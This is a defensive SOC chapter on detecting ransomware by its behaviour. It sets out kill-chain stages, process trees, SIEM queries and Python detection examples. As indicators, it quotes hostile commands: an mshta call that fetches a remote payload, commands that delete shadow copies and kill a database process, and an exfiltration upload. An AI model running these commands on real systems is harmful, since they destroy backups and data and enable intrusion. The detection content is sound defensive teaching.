Ransomware Behavior Detection

Ransomware behavior detection focuses on identifying the early, mid, and late-stage actions of ransomware before the encryption phase completes.
Ransomware rarely appears as a single event. It follows a predictable kill chain made up of execution, privilege escalation, lateral movement, payload deployment, and finally mass encryption.
EDR and SIEM platforms, and the SOC analysts who work with them, rely on behavior detection because most modern ransomware evades signature-based antivirus and often uses fileless techniques, legitimate tools, and living-off-the-land binaries (LOLBins).

This chapter explains ransomware detection in full SOC depth, including indicators, telemetry patterns, practical queries, process trees, and investigation workflows.


Understanding Ransomware Behavior

Ransomware behavior can be grouped into stages:

  • Initial Access

  • Execution

  • Discovery & Privilege Escalation

  • Lateral Movement

  • Payload Staging

  • Data Destruction & Encryption

  • Cleanup

Detection happens by analyzing these stages in endpoint telemetry, network logs, and SIEM correlation.


Early-Stage Ransomware Indicators

These appear before encryption and are the most valuable for detection.

Suspicious Script Execution

Examples:

  • Encoded PowerShell

  • Obfuscated commands

  • WMI execution

  • Suspicious cmd or bash scripts

  • mshta execution

Pattern:

powershell.exe -nop -w hidden -enc JAB...
mshta.exe http://malicious/payload.hta

Delivery Chain Indicators

Ransomware commonly enters through:

  • Phishing → macro → PowerShell

  • Exploited RDP

  • Exploited VPN

  • Droppers using curl/wget

  • Malicious installers

Process chain example:

WINWORD.exe → powershell.exe → curl.exe → loader.exe

Tools Used During Attack

Attackers often use:

  • PowerShell

  • wmiexec

  • PsExec

  • Cobalt Strike

  • net.exe

  • nltest.exe

  • whoami

  • ipconfig /all

Reconnaissance example:

net user /domain
nltest /domain_trusts

Recon activity before encryption is a strong sign of ransomware staging.


Mid-Stage Ransomware Indicators

Attackers prepare the environment or spread laterally.

Privilege Escalation Indicators

Examples:

  • UAC bypass

  • Token manipulation

  • Credential dumping

EDR detects:

process: attacker.exe → lsass.exe (memory read)

Stopping Security Tools and Backups

Common commands:

net stop "VSS"
vssadmin delete shadows /all
wmic shadowcopy delete

These actions are highly suspicious.

Persistence Creation

Examples:

  • Scheduled tasks

  • Services

  • Registry Run keys

Pattern:

schtasks.exe /create ...
sc.exe create ...

Lateral Movement Behavior

Common patterns:

  • PsExec

  • WinRM

  • WMI

  • RDP brute force

Process tree example:

psexesvc.exe → cmd.exe → powershell.exe

This type of chain frequently precedes ransomware deployment.


Late-Stage Ransomware Indicators (Active Encryption)

These confirm ransomware is running.

Suspicious File Rewrite Patterns

High-volume file changes:

  • Many files renamed

  • Extensions changed

  • File entropy increased

EDR can detect:

process writes thousands of files in seconds
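The two file-side indicators above, a process renaming files faster than any user would and the written content having the entropy of ciphertext, can be checked directly on file telemetry. The following is an added example, not code from the chapter; the 7.0 bits/byte threshold, the 500-renames-per-60-seconds window, and the sample events are assumptions constructed for illustration.

```python
import math
import random
from collections import Counter

# Assumed threshold: compressed or encrypted content usually sits above ~7.0 bits/byte,
# while documents, source code and logs sit well below it.
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def rename_burst(events, threshold=500, window_s=60):
    """Return the process name that renamed more than `threshold` files inside any
    `window_s`-second window, or None. events: iterable of (timestamp_s, process_name, type)."""
    per_proc = {}
    for ts, proc, etype in events:
        if etype == "rename":
            per_proc.setdefault(proc, []).append(ts)
    for proc, times in per_proc.items():
        times.sort()
        start = 0  # left edge of the sliding window
        for end, ts in enumerate(times):
            while ts - times[start] > window_s:
                start += 1
            if end - start + 1 > threshold:
                return proc
    return None


# Constructed samples (not captured from a real host).
PLAINTEXT = b"Quarterly report: revenue flat, costs up, headcount unchanged. " * 64
CIPHERTEXT_LIKE = random.Random(7).randbytes(4096)  # deterministic stand-in for encrypted output

# 600 renames by one process within 30 seconds, plus sparse benign renames by another.
FILE_EVENTS = [(100.0 + i * 0.05, "crypt.exe", "rename") for i in range(600)]
FILE_EVENTS += [(200.0 + i * 10.0, "explorer.exe", "rename") for i in range(20)]

if __name__ == "__main__":
    print("plaintext entropy:", round(shannon_entropy(PLAINTEXT), 2))
    print("ciphertext-like entropy:", round(shannon_entropy(CIPHERTEXT_LIKE), 2))
    print("rename burst by:", rename_burst(FILE_EVENTS))
```

In production the entropy check runs on the bytes of each newly written file and is combined with the rename-rate check, since high entropy alone also fires on legitimate archives and media.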

Mass Use of Crypto Libraries

Indicators:

  • OpenSSL

  • CryptoAPI

  • Custom encryption routines

Ransom Note Creation

Files like:

README.txt
RECOVER_FILES.txt
HOW_TO_DECRYPT.html

These are created almost simultaneously across many directories.

Killing Processes Before Encryption

Ransomware stops:

  • Database services

  • Backup services

  • Email servers

Example:

taskkill /IM sqlservr.exe /F

Network Indicators of Ransomware

C2 Communication Before Encryption

Outbound to:

  • .biz

  • .xyz

  • .top

  • Fast-flux IP ranges

  • Newly registered domains

Beacon pattern:

process → IP:443 every 5 seconds

Lateral Movement Traffic

  • SMB traffic to multiple systems

  • RDP/WinRM authentication bursts

Data Exfiltration (Double Extortion)

Ransomware often exfiltrates data before encryption.

Indicators:

  • Large outbound transfers

  • Uploads to cloud storage sites

  • Unusual protocols or ports

Example:

powershell.exe → https://fileshareupload.net/upload

Behavioral Patterns per Ransomware Family

LockBit Behavior

  • PsExec deployment

  • Uses PowerShell for reconnaissance

  • Stops services

  • Deletes shadow copies

Conti Behavior

  • Highly aggressive scanning

  • Cobalt Strike heavily used

  • LSASS dumping

  • Mass lateral movement

Hive Behavior

  • Drops multiple ransom notes

  • Uses encrypted communication

  • Multistage loader

Behavior beats signatures.
Behavior-based detection lets the SOC catch new variants even when the family name and the binary change.


EDR Telemetry Useful for Ransomware Detection

Process Indicators

  • PowerShell, cmd, or mshta spawning unknown binaries

  • Rundll32 loading unfamiliar DLLs

  • High process execution rate

File Indicators

  • Many file modifications

  • Unexpected encryption file extensions

  • Fast rename operations

Registry Indicators

  • Autorun keys

  • Deleted backups

  • New services created

Memory Indicators

  • Injection into explorer.exe

  • Shellcode regions

  • Stagers inside legitimate processes

Network Indicators

  • Burst SMB traffic

  • Repeated 445 connections

  • Outbound C2 beacons


Detection Queries (Practical Examples)

Detect PowerShell Encoding

process_name:powershell AND commandline:*enc*

Detect Shadow Copy Deletion

process_name:vssadmin AND commandline:*delete shadows*

Detect Suspicious File Renaming

file_event.type:rename AND count > 500 in 60 seconds

Detect PsExec Lateral Movement

process_name:psexesvc.exe

Detect Outbound to Suspicious Domains

dest_domain.keyword:*.biz AND process_name:powershell

Detect Memory Injection

process.memory_protection:RWX
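The process-level queries above can be expressed as predicates and run over process-creation events from any EDR or SIEM. This is an added example, not code from the chapter; the field names, the sample events and the suspicious-TLD list are assumptions chosen to mirror the query language used above. The memory-injection query is omitted because it needs memory-protection telemetry that a process event does not carry.

```python
import re

# Constructed process-creation events (not real telemetry); fields mirror the queries above.
PROCESS_EVENTS = [
    {"process_name": "powershell.exe", "commandline": "powershell.exe -nop -w hidden -enc JAB...", "dest_domain": None},
    {"process_name": "vssadmin.exe", "commandline": "vssadmin delete shadows /all /quiet", "dest_domain": None},
    {"process_name": "wmic.exe", "commandline": "wmic shadowcopy delete", "dest_domain": None},
    {"process_name": "psexesvc.exe", "commandline": "psexesvc.exe", "dest_domain": None},
    {"process_name": "powershell.exe", "commandline": "powershell.exe -c Invoke-WebRequest", "dest_domain": "cdn.example.biz"},
    {"process_name": "notepad.exe", "commandline": "notepad.exe C:\\notes.txt", "dest_domain": None},
]

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand; a plain *enc* wildcard misses the short forms.
ENCODED_FLAG = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b")
SUSPICIOUS_TLDS = (".biz", ".xyz", ".top")  # the TLDs listed in the network-indicators section


def is_proc(event, name):
    return event["process_name"].lower() == name


# Each rule is a predicate over one event; names describe the indicator, not a specific family.
RULES = {
    "powershell_encoded_command": lambda e: is_proc(e, "powershell.exe")
        and ENCODED_FLAG.search(e["commandline"]) is not None,
    "shadow_copy_deletion": lambda e: (is_proc(e, "vssadmin.exe") and "delete shadows" in e["commandline"].lower())
        or (is_proc(e, "wmic.exe") and "shadowcopy delete" in e["commandline"].lower()),
    "psexec_service_lateral_movement": lambda e: is_proc(e, "psexesvc.exe"),
    "powershell_to_suspicious_tld": lambda e: is_proc(e, "powershell.exe")
        and bool(e["dest_domain"]) and e["dest_domain"].lower().endswith(SUSPICIOUS_TLDS),
}


def evaluate(events):
    """Return {rule_name: [event indexes]} for every rule that fired on at least one event."""
    hits = {}
    for i, event in enumerate(events):
        for name, pred in RULES.items():
            if pred(event):
                hits.setdefault(name, []).append(i)
    return hits


if __name__ == "__main__":
    for name, idx in evaluate(PROCESS_EVENTS).items():
        print(f"{name}: events {idx}")
```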

SOC Workflow for Ransomware Detection

Step 1 — Identify Suspicious Initial Process

Example:

powershell.exe -enc

Step 2 — Analyze Parent & Child Processes

Example:

WINWORD.exe → powershell.exe → loader.exe

Step 3 — Check for Backup Deletion

Look for:

  • vssadmin

  • wmic shadowcopy delete

Step 4 — Check for Reconnaissance

Examples:

net user
ipconfig /all
nltest

Step 5 — Check for Lateral Movement

Examples:

  • PsExec

  • WMI

  • WinRM

Step 6 — Analyze Encryption Behavior

A sustained burst of file writes from one process is a near-certain sign of active encryption.

Step 7 — Confirm C2 Activity

Check DNS and firewall.

Step 8 — Contain

  • Isolate host

  • Kill processes

  • Block C2 IPs

  • Disable compromised accounts
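Steps 1 through 7 each produce a stage observation, and the containment decision in step 8 rests on how those observations chain together on one host. The following is an added example, not code from the chapter, that correlates per-host stage observations into a timeline; the observation records, the one-hour window and the containment policy (encryption seen, or at least two distinct stages on one host) are assumptions.

```python
from collections import defaultdict

# The workflow's step order; the index doubles as kill-chain position for sorting.
STAGES = ("initial_process", "parent_child_chain", "backup_deletion",
          "reconnaissance", "lateral_movement", "encryption", "c2")

# Constructed stage observations (host, unix_seconds, stage, detail); not real alerts.
OBSERVATIONS = [
    ("ws01", 1000, "initial_process", "powershell.exe -enc"),
    ("ws01", 1005, "parent_child_chain", "WINWORD.exe -> powershell.exe -> loader.exe"),
    ("ws01", 1300, "reconnaissance", "nltest /domain_trusts"),
    ("ws01", 1900, "backup_deletion", "vssadmin delete shadows /all"),
    ("ws01", 2100, "c2", "loader.exe -> 203.0.113.10:443 every 5s"),
    ("ws01", 9000, "lateral_movement", "psexesvc.exe (outside the window)"),
    ("srv02", 2400, "lateral_movement", "psexesvc.exe -> cmd.exe"),
    ("srv02", 2500, "encryption", "1200 renames in 60s"),
    ("ws07", 5000, "reconnaissance", "ipconfig /all"),
]


def build_timelines(observations, window_s=3600):
    """Per host: observations within window_s of that host's first observation, in time order."""
    by_host = defaultdict(list)
    for host, ts, stage, detail in sorted(observations, key=lambda o: o[1]):
        by_host[host].append((ts, stage, detail))
    return {host: [o for o in obs if o[0] - obs[0][0] <= window_s] for host, obs in by_host.items()}


def summarize(timelines):
    """Per host: distinct stages in kill-chain order plus the first indicator to pivot on (step 1)."""
    return {host: {"stages": sorted({s for _, s, _ in obs}, key=STAGES.index), "pivot": obs[0][2]}
            for host, obs in timelines.items() if obs}


def containment_candidates(timelines, min_stages=2):
    """Assumed policy: contain a host when encryption is seen or min_stages distinct stages chain on it."""
    out = []
    for host, obs in timelines.items():
        stages = {s for _, s, _ in obs}
        if "encryption" in stages or len(stages) >= min_stages:
            out.append(host)
    return sorted(out)


if __name__ == "__main__":
    timelines = build_timelines(OBSERVATIONS)
    for host, info in summarize(timelines).items():
        print(host, info["stages"], "pivot:", info["pivot"])
    print("contain:", containment_candidates(timelines))
```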


Practical Ransomware Case Studies

Case 1 — Phishing → Loader → Encryption

Chain:

WINWORD.exe  
  ↳ powershell.exe  
      ↳ curl.exe  
      ↳ loader.exe  
          ↳ ransomware.exe

Indicators:

  • Shadow copy deletion

  • Many file writes

  • Ransom note creation


Case 2 — RDP Compromise → Lateral Movement → Encryption

Indicators:

  • Bursts of 4624/4625 logon events

  • PsExec usage

  • LSASS dumping

  • Encryption across multiple hosts


Case 3 — Fileless Ransomware

Indicators:

  • Memory-only stages

  • PowerShell reflective loading

  • No file writes before final stage

Memory forensics is required.


Intel Dump

  • Ransomware behavior detection focuses on recognizing execution patterns before encryption.

  • Early signs include PowerShell execution, encoded commands, mshta, and downloader chains.

  • Mid-stage signs include lateral movement, privilege escalation, backup deletion, and reconnaissance.

  • Late-stage signs include mass file writes, process killing, ransom note creation, and crypto library usage.

  • SOC uses EDR telemetry, SIEM logs, and network analysis to detect each stage.

  • Combining process trees, memory forensics, and network behavior provides the strongest detection.
